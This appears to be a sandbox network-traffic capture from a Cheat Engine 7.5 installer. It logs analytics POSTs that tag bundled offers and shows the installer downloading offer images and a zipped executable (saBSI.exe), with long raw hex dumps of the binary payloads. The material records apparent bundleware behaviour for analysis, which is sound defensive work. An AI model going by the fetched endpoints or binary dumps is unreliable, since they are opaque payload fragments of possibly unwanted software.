2024-12-28 21:20:41 UTC	395	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Vary: Origin Date: Sat, 28 Dec 2024 21:20:41 GMT Via: 1.1 ab5a0b129a46042ccb6b286f29e7940c.cloudfront.net (CloudFront), 1.1 d5d5fbb221d1e1e64574f5113ce6ed5c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C1 X-Cache: Miss from cloudfront X-Amz-Cf-Pop: TLV50-C1 X-Amz-Cf-Id: axxMKdCx95Un_WwlzHfkU0Ojn2hd02wHzbhxaEm7q_wR1KiIshx3Ww==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49772	65.9.108.148	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:44 UTC	311	OUT	POST /zbd HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 418 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:20:44 UTC	418	OUT	Data Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 4f 70 65 72 61 5f 72 65 65 6e 67 61 67 65 64 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 4f 70 65 72 61 5f 72 65 5f 56 33 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 2c 5c Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"Opera_reengaged\",\"18\":\"ZB_Opera_re_V3\",\"19\":\"pac_241007\",\"21\":\"1707gdip\",\
2024-12-28 21:20:45 UTC	427	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 15 Connection: close Date: Sat, 28 Dec 2024 21:20:44 GMT Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE Access-Control-Allow-Origin: * X-Cache: Miss from cloudfront Via: 1.1 56706a0e74c90535106878a6a2f1475c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: 0QoV6ht9g5nzsUtXQkJyCP8eux7zPaEkwcuNQS-uZmoKI0EByeBQMg==
2024-12-28 21:20:45 UTC	15	IN	Data Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d Data Ascii: {"Status":"OK"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49778	13.226.4.166	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:46 UTC	308	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 473 Host: d31tu1fsc224h4.cloudfront.net
2024-12-28 21:20:46 UTC	473	OUT	Data Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
2024-12-28 21:20:47 UTC	395	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Vary: Origin Date: Sat, 28 Dec 2024 21:20:47 GMT Via: 1.1 759e09affff41285e9585e1a31532bd4.cloudfront.net (CloudFront), 1.1 a8d6fe7391dc1997a312e8d585f06950.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C1 X-Cache: Miss from cloudfront X-Amz-Cf-Pop: TLV50-C1 X-Amz-Cf-Id: AxIkteg9VpikJaQ3KeMmm_LtrRUfj5fztBz44A-D7bWiG-69cxJhRw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49784	65.9.108.148	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:49 UTC	140	OUT	GET /f/WeatherZero/images/969/EN.png HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:20:50 UTC	511	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 30586 Connection: close Last-Modified: Thu, 08 Dec 2022 12:37:43 GMT x-amz-version-id: MVrTExmvEQAJj6fAGLSH_gwH63ab4qxc Accept-Ranges: bytes Server: AmazonS3 Date: Sat, 28 Dec 2024 08:03:57 GMT ETag: "9ac6287111cb2b272561781786c46cdd" X-Cache: Hit from cloudfront Via: 1.1 a952a9f23f3cd76250ef3c22a1c48a20.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: gAy3lJ-8nWWBPnY1ma3JTD3c2h2xWpbuOPor_1OGTuUB-atOssC-kA== Age: 47813
2024-12-28 21:20:50 UTC	15873	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 bc 00 00 01 68 08 06 00 00 00 b5 fd 28 e7 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 77 0f 49 44 41 54 78 01 ed bd 09 9c 5d 57 75 e6 bb 35 db 12 e0 12 24 a4 b1 8d 55 02 e7 e1 e9 21 89 04 92 74 9a 48 22 84 90 a1 23 39 09 79 49 27 d8 12 83 33 30 48 02 cc 0c 92 18 02 06 82 24 27 61 36 1a 92 ce 44 82 a4 4e 77 42 9a 04 c9 34 09 74 42 9e 24 9e b1 8d 27 95 07 08 84 07 92 30 c8 b2 64 bb 7a 7d 57 f7 2b 2f 2d ed 33 dc aa 5b 75 ef 3d f5 fd 7f bf 53 f7 0c 7b 58 7b ed 69 9d 7d f6 de 95 92 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 Data Ascii: PNGIHDRh(pHYssRGBgAMAawIDATx]Wu5$U!tH"#9yI'30H$'a6DNwB4tB$'0dz}W+/-3[u=S{X{i}B!B!B!B!B!B!B!B
2024-12-28 21:20:50 UTC	10974	IN	Data Raw: 62 8c 5e 2e 5a 03 9c 54 9e 9b 48 ce c9 f6 71 b1 00 57 4a 73 a2 3e 7e fd c2 07 4c c8 4f ed 55 b7 c3 ed d5 fd 7e d2 3d 26 e4 0f b7 57 b5 c2 2d 17 5b 70 a1 07 88 f7 b8 22 9a 71 e2 99 35 14 63 ee e3 a2 05 fa 2f 3b 38 91 9e ab 5b 19 3e 0e 9f e6 94 99 c8 8f e7 65 3a 88 70 35 2b 57 df 72 b1 d0 50 d8 29 81 ab 5a 19 a6 8f 77 b8 bd d2 d8 eb c0 af 1e 2f 5b b4 96 d3 1f e5 65 5a 18 3e 7e e3 6a 6d ca 9f da 8b 85 fc a2 b5 9c 0e f1 9c 8b 17 72 8b 25 aa 16 50 c4 c5 39 f1 1e d3 53 26 b3 97 89 72 95 2d 5a 2b 0a 8f 0b 47 a2 0e 63 9e 97 e9 c0 97 17 3e f3 3a f4 79 47 62 99 19 6e 2f b4 f2 8b 9c 58 d7 7c be c7 7c ae 5a d0 c5 c5 2a de 1d 57 ce c7 dd 1d 7c 7c 8c 23 a6 b1 2c 4f b6 b7 17 10 f9 72 94 5b c0 e4 ef e5 ea a7 2f 37 a9 62 e5 39 f5 eb cb 13 17 1c 32 5c b6 57 4c ef f6 b0 68 Data Ascii: b^.ZTHqWJs>~LOU~=&W-[p"q5c/;8[>e:p5+WrP)Zw/[eZ>~jmr%P9S&r-Z+Gc>:yGbn/X\|\|Z*W\|\|#,Or[/7b92\WLh
2024-12-28 21:20:50 UTC	3739	IN	Data Raw: 1b 29 ac 03 fe e5 2b 8e c9 02 79 d2 49 79 a8 a2 9b 61 81 41 cc b3 5e b3 74 e9 d2 33 f2 01 3a f4 ff 26 18 ff 36 b8 97 c0 10 84 8c dd a4 d7 e5 c4 ff 2b e1 5e 7d 49 42 9c 6b d6 ac 69 1d 42 88 e9 8d 46 78 db e0 b3 d7 de bd 7b 5b e7 18 f9 c1 68 0b a7 1b 60 a4 c4 8f a8 61 34 06 60 f4 80 a3 32 68 58 bd fb f8 09 8a 23 4a fc bc 06 bf 78 7b 86 bf 18 37 ae 19 0e dc f9 8e 02 61 e2 5e 4e 2e 80 30 e9 1f bf 65 9d 1e 9e 33 1d 0c a7 2a 1d 11 ea 09 72 d3 8f 1f 39 43 47 8e 78 e0 ce 4f dd 88 e9 f0 53 08 e0 36 f7 59 1f 7a c7 28 1d 46 ad 28 3b 65 66 58 b8 9f 1b 69 a4 1f ba f1 a3 69 11 e6 09 47 36 98 cf 5e 2f de bf d7 19 0e c8 e9 75 e6 f3 17 f8 72 c0 72 11 a7 03 78 79 7d 78 70 8b f4 41 0f d4 01 9e 21 9c 9c 2e 73 78 dd e7 74 96 4b 6f fc 1c cc 7c 65 9e d6 19 05 f2 65 3b ea 28 a6 Data Ascii: )+yIyaA^t3:&6+^}IBkiBFx{[h`a4`2hX#Jx{7a^N.0e3*r9CGxOS6Yz(F(;efXiiG6^/urrxy}xpA!.sxtKo\|ee;(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49793	65.9.108.148	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:52 UTC	149	OUT	GET /f/RAV_Triple_NCB/images/DOTPS-855/EN.png HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:20:53 UTC	570	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 75974 Connection: close Last-Modified: Sun, 11 Sep 2022 12:56:32 GMT x-amz-meta-cb-modifiedtime: Sun, 11 Sep 2022 10:58:27 GMT x-amz-version-id: mCoh4hrlqpNiFIHFPwsLWmtCICuCsWOt Accept-Ranges: bytes Server: AmazonS3 Date: Sat, 28 Dec 2024 11:45:13 GMT ETag: "cd09f361286d1ad2622ba8a57b7613bd" X-Cache: Hit from cloudfront Via: 1.1 318dc0d466d2a355ca0bbeb0721ef1b8.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: udJQ4AAyAeHE0oHXcWbgH2rCDXvqsbajWQY4NFkcrmVvTYWnvLsMBw== Age: 34540
2024-12-28 21:20:53 UTC	16384	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 bc 00 00 01 68 08 06 00 00 00 b5 fd 28 e7 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 01 28 5b 49 44 41 54 78 01 ec bd 0b 9c 1d 55 95 2f fc 3f dd 9d a4 11 30 27 f2 48 00 25 95 41 24 0a 4e 9f cc e0 10 74 a0 2b d7 ab 20 dc 31 8d 8e 02 de ab 5d ed 38 c2 c0 38 dd 11 d4 71 be 19 fa 44 9d 4f 51 98 74 3e 47 c0 b9 a3 7d 5a ee 88 78 d5 74 0b 28 e0 9d db d5 e0 23 11 86 9c f0 d0 c4 0c 93 0a 02 76 46 30 27 3c 3b 21 dd e7 3b ab 6b af ec 5d fb 54 d5 a9 f3 ea ee 74 f6 ff f7 ab 5f 55 ed e7 da 6b af bd f6 da 8f da 05 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 Data Ascii: PNGIHDRh(pHYssRGBgAMAa([IDATxU/?0'H%A$Nt+ 1]88qDOQt>G}Zxt(#vF0'<;!;k]Tt_Uk
2024-12-28 21:20:53 UTC	16384	IN	Data Raw: ea 42 f7 b5 3e b1 63 eb 19 74 b1 c1 ab 82 66 34 17 b4 fb b3 9a 8b 8e 3e b6 70 f4 e2 e3 0a 7f f2 97 9f 19 63 7f 32 1c 1f 1b bb 6b da d8 3c ee a4 53 f7 ec 29 cd b0 aa f1 77 3e 78 ff b2 fb be 7d f3 05 7f fa a9 0d b7 87 e5 5d 9a 31 6e 7f 55 1d 07 8b 50 19 5f bb 72 55 fe df 1f ba 2f b3 60 d1 ab 26 8e 3f 79 b9 97 24 de 43 3f bc bd 83 8c dd 9e eb ff 65 23 ef 51 a6 fd bf a8 02 47 1d f3 ea 42 61 cf 93 81 59 f3 e7 9f 19 4f 97 f8 94 fe 8b 7f fc be 3d d0 b3 c6 0d 89 c6 2b 4e 59 cd bd a0 dc 6d c8 d9 5e 55 bf c4 cd f0 ee 0e 49 d7 82 5c 3d a9 06 23 22 7f ca 6f a3 e2 ee 89 7c f8 fb 8a bc e2 4e 18 46 90 5e 07 e5 fd 11 b4 f7 38 7d 49 e9 a5 51 1d 78 e0 4a 7a 7c 04 b2 bf 20 5d 41 ed af 4f 0b df 87 e0 e9 2f 6c 40 77 09 b7 1c 66 4e 9f 93 8e b4 34 37 3b 24 1c 85 f1 b4 77 2a 6b Data Ascii: B>ctf4>pc2k<S)w>x}]1nUP_rU/`&?y$C?e#QGBaYO=+NYm^UI\=#"o\|NF^8}IQxJz\| ]AO/l@wfN47;$w*k
2024-12-28 21:20:53 UTC	12288	IN	Data Raw: f5 7d 1a 97 d9 43 6d f6 4d 35 a8 34 63 4c f9 11 bf b2 90 db 23 19 bc 6d 45 dd 8e b1 a2 42 7a 14 ae d1 b6 d5 ac a0 91 06 af 0b f9 01 03 2b 48 4b f1 f7 84 3b 75 d2 59 c5 dd 86 9c 9d a9 04 12 3c 9e e5 55 bf 96 e5 fb 80 96 4e 1f ea 9b 6d a5 f2 e4 10 34 0a 72 ca b3 0d f9 f1 43 4e f1 e7 86 d9 08 14 20 67 a7 d4 b2 d1 c8 4c 1d 09 ea a3 34 1b 41 81 d4 95 90 a5 3c 67 44 78 a2 99 95 73 0e c9 cb d1 27 ee 4b b4 fc ab 31 78 79 26 05 5a 1a 71 e1 01 39 03 ce e0 fd 4f a4 14 2c 2d 0e a7 5f 8f e1 62 85 bc 53 7a 1e c2 47 f2 e4 ce fb e5 54 54 23 9b bb c5 95 d5 f2 ed 4a 18 9f c3 52 5d ba c2 8d 9e 79 50 13 c0 f9 97 fd 45 61 e7 bf dd e7 6d 19 19 ea 78 f6 e9 5d d6 1f 5d 74 f9 3d ec 77 cc 6b 4e 28 19 b6 c7 15 fe e4 2f 3f 73 48 89 d3 87 49 8f 8d dd 75 c6 d1 e9 13 22 0d 97 bd 7b 9e Data Ascii: }CmM54cL#mEBz+HK;uY<UNm4rCN gL4A<gDxs'K1xy&Zq9O,-_bSzGTT#JR]yPEamx]]t=wkN(/?sHIu"{
2024-12-28 21:20:53 UTC	16384	IN	Data Raw: 1f f1 43 fd 82 dc 13 69 79 4a 38 17 c1 0f 30 a3 40 b2 44 9d 81 de 2e 78 2b 48 58 5c 17 7e bd 6c 45 f4 de e0 01 c8 e3 ab 54 19 76 84 3f b9 ad 57 ca c1 ef ba 11 9d 83 dc 5a c4 b4 e5 42 f2 ab 55 67 25 41 16 21 65 b1 2f bf ea 0b 29 60 f5 29 a7 9d 55 78 db fb 3e 7a fb 83 3f b8 ed 82 81 8f bc 7d 35 47 3a fb a2 4b 47 c2 f7 e3 4a d0 c7 6b c7 bc e6 84 71 3a 7b f7 5d 57 fc 4d e4 36 b8 a9 54 aa 30 d0 b3 26 89 71 18 46 7b a5 ce 9e 8d 20 5d df f0 92 3c f1 3f 07 c9 f7 2c e4 76 09 d6 77 2e a2 eb 29 87 ea 75 a5 8e 4b 20 8f 9c f3 44 7a c4 af be 84 f1 55 f9 70 34 37 42 16 c1 13 11 74 79 8d 4a d3 45 70 8f 2f eb 9b 46 19 8f 1e fc 36 a6 b6 77 08 37 2f 22 8e 5a 9f 14 46 af 0f 5d 7f 30 1f a2 d2 ab 16 49 ec 16 bd 3e d3 28 ff e0 90 64 25 83 e4 75 cc 70 51 7d 5f 35 ef 90 c2 e1 0d Data Ascii: CiyJ80@D.x+HX\~lETv?WZBUg%A!e/)`)Ux>z?}5G:KGJkq:{]WM6T0&qF{ ]<?,vw.)uK DzUp47BtyJEp/F6w7/"ZF]0I>(d%upQ}_5
2024-12-28 21:20:53 UTC	14534	IN	Data Raw: d6 8f fc 9c 9a da f4 22 91 c6 a4 17 e6 28 56 01 bd 5e e1 e5 41 4d 8a 8d 3a 64 2f f2 af b9 9a 45 77 b4 b0 bc 18 e4 cb cd b7 a4 96 8b 1a 7a 07 b7 ef 50 20 fd 14 59 c1 a6 e3 c9 e2 a4 7a d2 d6 ad 82 f3 a5 a6 cd 93 45 11 a4 cc 1b 68 d7 8f fa 90 fa b2 0f dd b5 75 ab c3 79 a7 b8 b4 82 32 60 ff c8 d0 a1 8b 17 ba 82 1f c5 f2 d0 42 76 62 eb 54 d7 14 79 45 47 2b 1f 53 58 5a 19 fc 34 77 75 99 26 f5 d9 76 1b 87 27 aa 99 bf ff c3 57 51 7d fa cc b3 2e 3b 8c 65 80 56 4c 6f f9 a7 eb fa af 7c c5 eb 0f f0 9b 0d 68 85 96 fe 0e 25 fb 0d ad c6 2e 6c 59 98 37 b6 df 3d bc e3 35 0f dc 7f 5f 6d 83 79 da e1 c7 5c 60 ee 7e c6 f3 7f fe d0 a7 9a ef 18 2c 4a 9b f6 06 3f f2 ec 73 5b 67 d7 1e 93 91 a1 47 6f 78 e2 91 c7 5e f8 e4 ca ca 9f ca 75 d6 bc 91 3b 3d 75 d3 a6 6f 4f 1f 36 e7 3f f1 Data Ascii: "(V^AM:d/EwzP YzEhuy2`BvbTyEG+SXZ4wu&v'WQ}.;eVLo\|h%.lY7=5_my\`~,J?s[gGox^u;=uoO6?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49838	65.9.108.93	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:21:14 UTC	142	OUT	GET /f/WebAdvisor/files/1489/saBSI.zip HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:21:14 UTC	628	IN	HTTP/1.1 200 OK Content-Type: application/x-zip-compressed Content-Length: 527389 Connection: close Last-Modified: Tue, 26 Mar 2024 13:11:30 GMT x-amz-server-side-encryption: AES256 x-amz-meta-cb-modifiedtime: Tue, 26 Mar 2024 13:10:42 GMT x-amz-version-id: 7sn0EuMWH3aYiKrbA4lOPgyoNDAU9iIf Accept-Ranges: bytes Server: AmazonS3 Date: Sat, 28 Dec 2024 10:18:31 GMT ETag: "f68008b70822bd28c82d13a289deb418" X-Cache: Hit from cloudfront Via: 1.1 cb867cfec78eb078033d4ae0c86dfaa0.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: pT5mIz7G8kJ_eul9ja2Wy_1qRvrTTlkIcHnkwGpidJN4CwHWAnv-4Q== Age: 39764
2024-12-28 21:21:15 UTC	16384	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 9b 5c 7a 58 1c 99 c3 c5 a9 0b 08 00 80 11 12 00 09 00 00 00 73 61 42 53 49 2e 65 78 65 e4 5a 7f 70 54 d7 75 be 2b 69 a5 d5 8f 65 57 20 63 d9 c8 f1 da 26 8e 9a c1 92 6c a1 09 13 8b c9 82 59 5b 06 01 8b 2d 40 60 01 c2 08 f1 90 65 90 b1 b0 e5 16 3b 72 05 54 ab 95 1c 4d 4a 33 b4 61 dc 5d ad dc 68 3a 9a 56 46 3f d8 75 15 b3 c4 54 12 1d 1c 2b ad 9a 28 29 d3 ca 89 3b f3 1c d4 76 93 12 5b 76 15 d4 f3 9d fb f6 bd dd d5 92 e0 bf b3 03 f7 5d 9d f7 9d ef 9e 73 ee bd e7 fe d8 dd bc bb 5b a4 0a 21 d2 e8 ff c2 82 10 41 21 3f 4e f1 fb 3f 25 26 21 96 dc fb ce 12 31 94 f9 fe 7d 41 53 e5 fb f7 55 29 87 5f 74 34 1d 3b 7a e8 d8 fe e7 1d 07 f6 1f 39 72 b4 d9 f1 ec 41 c7 b1 e3 47 1c 87 8f 38 36 6c 7d da f1 fc d1 ba 83 45 56 6b d6 4a 8d e3 11 db 87 Data Ascii: PK\zXsaBSI.exeZpTu+ieW c&lY[-@`e;rTMJ3a]h:VF?uT+();v[v]s[!A!?N?%&!1}ASU)_t4;z9rAG86l}EVkJ
2024-12-28 21:21:15 UTC	16384	IN	Data Raw: d4 86 29 b5 21 4a 6d 20 dd dc 3f cd bc a4 c3 4c 4d cb 4b 26 b6 e9 52 33 78 49 ff 71 23 35 c9 4b 06 78 6a cd 94 5a 13 a5 16 48 b7 3c 4c 33 2f 59 bc 4d a6 a6 e5 25 67 68 53 33 78 c9 3b 8f 19 a9 49 5e 32 cc 53 eb a5 d4 7a 28 b5 70 ba 15 64 9a 79 c9 eb 7b 65 6a 7b 1c 9a d4 ca 7a 75 a9 19 bc e4 da 01 23 b5 f4 bc e4 90 e4 25 87 38 2f 39 2c 79 c9 84 e0 25 4f 1d 4b cf 4b 36 6e c5 1b 5b 2c 42 ff b2 35 cd 22 f4 e7 37 31 8d fb 3f 9f 99 81 97 cc f1 08 5e 32 b6 d1 d8 1d 66 67 3a 73 d9 8f e4 a7 5b 52 79 49 57 a7 b1 1d 8c ab bc b8 ea 95 2d 13 f3 92 0b 3d 82 97 6c 31 6c 7d b0 bd 1e b6 2b b6 68 f7 63 06 b7 f2 e5 8c 78 c9 80 47 f0 92 8d 78 12 e0 3d 9d c2 4b 26 3a b1 e3 0b c9 79 5b d0 20 b6 fd 12 85 97 f4 75 19 54 83 07 fb 25 4d 30 b9 62 8b 6d bf 64 11 f9 27 5e 32 2c 9f e7 Data Ascii: )!Jm ?LMK&R3xIq#5KxjZH<L3/YM%ghS3x;I^2Sz(pdy{ej{zu#%8/9,y%OKK6n[,B5"71?^2fg:s[RyIW-=l1l}+hcxGx=K&:y[ uT%M0bmd'^2,
2024-12-28 21:21:15 UTC	16384	IN	Data Raw: be cb 8f ff db b1 fd 37 c7 f5 ff ed c1 e3 9f fc 7f 35 fe cd 38 fe df bf cc f8 ef 55 c7 ff 6d 65 fc c7 c5 8f 7f 91 9a 74 6a 6e 34 36 6b 16 71 58 31 9b 20 e8 85 96 62 57 65 0d aa 33 c0 78 40 4c cd 72 d1 94 71 c0 23 e1 a7 cd 15 12 13 3d 21 d1 1c 12 8d 85 c5 54 07 fa 22 79 c6 86 7e 02 ff de 34 d2 0c 7c 2f bd 8d ea 27 28 4e e9 c4 18 7a cb a8 9f 8e d8 fe d3 24 4c 57 d5 80 db f8 ab 2c 92 63 37 62 fa 08 a8 67 a0 3f b1 2d ed f8 e3 42 3d 4a 88 64 b5 65 62 8f bd 47 34 60 82 d0 d6 a0 9e e4 25 92 02 ab c7 ed 42 cb d6 1f 31 ae 0b 24 e3 56 c9 b9 77 c3 25 2e 09 04 ca d9 67 4c 66 a7 d5 94 dc 68 9a 9f b0 b5 17 f3 44 df 95 50 0d df ab d2 64 47 1b 2c 5f 67 4c 63 8c 36 ba a4 1e 40 73 b4 bd b5 f5 29 0d f7 0b dc 5b d4 f4 97 f6 94 a6 ff 68 f8 b9 c8 71 18 1f e9 dc ab 03 e9 d6 df Data Ascii: 758Umetjn46kqX1 bWe3x@Lrq#=!T"y~4\|/'(Nz$LW,c7bg?-B=JdebG4`%B1$Vw%.gLfhDPdG,_gLc6@s)[hq
2024-12-28 21:21:15 UTC	16384	IN	Data Raw: 2c 4f 70 8b 5b 6b f0 7c b9 b7 3e e8 ed 54 4e c9 3b 32 13 c7 fb fc 8b b1 ac e3 dd 05 31 10 01 6b c2 f8 f7 5c 88 7f 31 93 2b f7 f3 9a e9 41 aa 58 58 7e 2b eb 59 bd d2 eb 57 b0 b6 5f b4 b8 cc ea 37 56 7a 9a ff fc 44 38 00 85 8e b7 ac b0 1c 87 01 b6 7c 27 4a 69 91 96 36 a0 44 7d 5c 61 97 40 5e ef d5 6c fd dd 78 6e 5a b3 95 b8 f9 86 ad a1 e5 ef 1c 56 07 8b 40 84 51 26 64 e5 ba ec d4 44 84 b7 49 c4 08 c0 ed e0 f2 46 21 2c 53 ba b9 1e c0 63 33 15 2c 19 97 71 48 5e fe 10 58 dc 22 f6 b8 23 e3 a4 bc b4 08 ae 65 2f 4e 00 58 ed 70 31 db c7 76 3a f7 38 6b b0 58 22 9d a0 3d e4 dd 23 67 1c 78 c2 c6 0e e8 10 0e cd 19 c7 9e 48 f8 38 68 40 38 88 9c 7b ec d9 5b a3 af a7 f7 f4 58 41 c7 d3 de 4a e1 cb e6 0a ba 0b e5 72 ea 4d de 23 1d 6a 96 b9 82 4e 17 bf 33 2a 6b 80 71 7b 71 Data Ascii: ,Op[k\|>TN;21k\1+AXX~+YW_7VzD8\|'Ji6D}\a@^lxnZV@Q&dDIF!,Sc3,qH^X"#e/NXp1v:8kX"=#gxH8h@8{[XAJrM#jN3*kq{q
2024-12-28 21:21:15 UTC	16384	IN	Data Raw: 8f 7b f1 1f 5c 89 2e 9d d8 bb 1a 77 a1 ef 26 3e 87 2e 86 1c e5 a6 3f a1 5b 17 3e e1 71 29 78 84 fe 3a 49 2b ed 7e 1d cf 68 36 ac db 85 c7 5a 9b c4 6b 00 ce d7 42 e1 37 9e 09 c1 e0 dd e9 00 d8 b9 86 1f be 45 04 5f ed c0 3c d3 18 1f 09 4f 9b 84 51 ab 07 36 fe 1a 2b 6b cc 88 46 2c 37 36 62 37 62 d9 ca 0d 50 57 77 b8 ae 7a a8 eb ec d8 c5 f5 c1 6e ba 8e dd 0d 02 3b ab a6 ac 09 28 6b d0 bd d4 c5 7d 5b 49 c0 c6 1d e9 b4 36 e7 8d 37 bd 6a 72 f3 6b f6 d0 a3 27 fa cb f1 0e 17 8f 6f 35 fa 38 c6 ef 5e ef eb 9a 09 42 7d c1 6f 07 0a 3a 3c a3 5f 5c a6 64 a6 dc 05 d2 cd 6a e6 a8 0a f0 39 9f 29 95 2a 9e a7 cf 65 ca 3c 55 b1 a8 ca 44 a6 cc 57 95 24 55 01 51 f2 a8 4a a2 aa 8c 67 ca 22 55 a1 00 73 ca 12 b7 5a 63 57 6b 8a 54 05 3a 83 4b 6c 77 f2 79 bb 43 bd 64 c3 50 a3 97 78 Data Ascii: {\.w&>.?[>q)x:I+~h6ZkB7E_<OQ6+kF,76b7bPWwzn;(k}[I67jrk'o58^B}o:<_\dj9)*e<UDW$UQJg"UsZcWkT:KlwyCdPx
